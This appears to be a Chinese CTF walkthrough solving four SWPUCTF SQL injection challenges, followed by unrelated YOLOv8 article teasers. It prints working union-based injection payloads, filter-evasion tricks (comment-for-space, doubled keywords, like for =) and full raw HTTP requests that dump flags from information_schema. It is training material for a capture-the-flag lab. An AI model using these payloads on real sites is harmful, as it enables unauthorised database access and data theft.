news 2026/6/25 16:37:58

题 453453

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
题 453453

1,[SWPUCTF 2021 新生赛]easy_sql

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

回显示为?wllm=-1' union select 1,2,3--+

?wllm=-1' union select 1,2,database()--+

库名是test_db

4.查看test_db库的表

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查看flag

-1' union select 1,2,group_concat(id,flag) from test_tb--+


2,

先判断注入类型

发现是1)))))

order by发现有两个回显示

显示数据库到第二个回显示

id=1))))))%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata%20--+

表名

1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

ctftraining 库中发现一个叫 flag 的表。

列名

1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+

找到对应的字符

1)))))) UNION SELECT 1, flag FROM ctftraining.flag; --+

3[SWPUCTF 2021 新生赛]sql
和之前一样但是我们发现这里有前端的提示不能用 oder by

因为空格和空格的 URL 中的特殊编码字符(+ 号作为)被禁用

在 SQL 注入防护中,很多系统会对特殊字符进行过滤,+ 号作为 URL 中的特殊编码字符,也可能被目标系统直接拦截或转义,导致 --+ 无法完整传递到数据库,自然无法发挥注释作用。

到这里之后开始union注入,发现 = 也是被检测的,可以使用like来代替 =

?wllm=-1'union/**/select/**/1,2,3%23

查表名

?wllm=-1%27union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23

查字段

?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23


查flag(发现不全)

?wllm=-1'union/**/select/**/1,group_concat(flag),3/**/from/**/LTLT_flag%23

NSSCTF{d064d030-12fb

用mid分段查

前面

?wllm=-1%27union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),1,30),3%23

?wllm=-1'union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),21,41),mid((select/**/flag/**/from/**/LTLT_flag),42,62)%23

四,[SWPUCTF 2022 新生赛]ez_sql
get

GET /?nss=1 HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i

让用post传参

改内容如下

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

nss=1

查列数

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

nss=-1'/**/oorrder/**/by/**/4#

三没有报错

发现union被过滤,双写union绕过

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

nss=-1/**/uunionnion/**/select/**/1,2,database()#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

nss=nss=4'/**/ununionion/**/select/**/1,database(),3;#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#


POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/23 17:55:06

YOLOv8 UPSampling伪标签质量提升方法

YOLOv8 UPSampling伪标签质量提升方法 在工业质检、智能安防等现实场景中,目标检测模型的性能往往受限于高质量标注数据的稀缺。尽管YOLOv8凭借其高效架构成为主流选择,但面对大量未标注图像时,如何低成本挖掘有效监督信号仍是工程落地的关键…

作者头像 李华
网站建设 2026/6/21 18:25:11

YOLOv8学生竞赛获奖作品分析

YOLOv8学生竞赛获奖作品分析 在近年来的高校人工智能竞赛中,一个现象格外引人注目:越来越多的学生团队凭借基于 YOLOv8 的目标检测系统斩获大奖。从智能教室行为识别到无人机航拍目标追踪,这些项目不仅展示了扎实的工程能力,更体现…

作者头像 李华
网站建设 2026/6/21 8:20:07

YOLOv8训练命令解析:epochs、imgsz参数优化建议

YOLOv8训练核心参数调优实战:如何科学设置 epochs 与 imgsz 在目标检测的实际项目中,我们常常遇到这样的问题:模型在训练集上表现很好,但一到真实场景就“抓瞎”;或者训练速度慢得让人怀疑人生,显存还动不动…

作者头像 李华
网站建设 2026/6/19 22:13:02

YOLOv8 pip安装失败?换源解决网络问题

YOLOv8 pip安装失败?换源解决网络问题 在深度学习项目开发中,目标检测模型的快速部署往往是第一步。YOLO(You Only Look Once)系列自诞生以来,就以“快”著称——不仅推理速度快,部署效率也高。然而&#…

作者头像 李华
网站建设 2026/6/14 12:30:31

YOLOv8 NAS网络结构搜索潜力挖掘

YOLOv8 NAS网络结构搜索潜力挖掘 在工业质检产线高速运转的视觉系统中,工程师常面临一个两难:模型精度稍有提升,推理延迟却陡增;而一味压缩模型,又导致漏检率飙升。这种“调参炼丹”式的反复试错,正是当前目…

作者头像 李华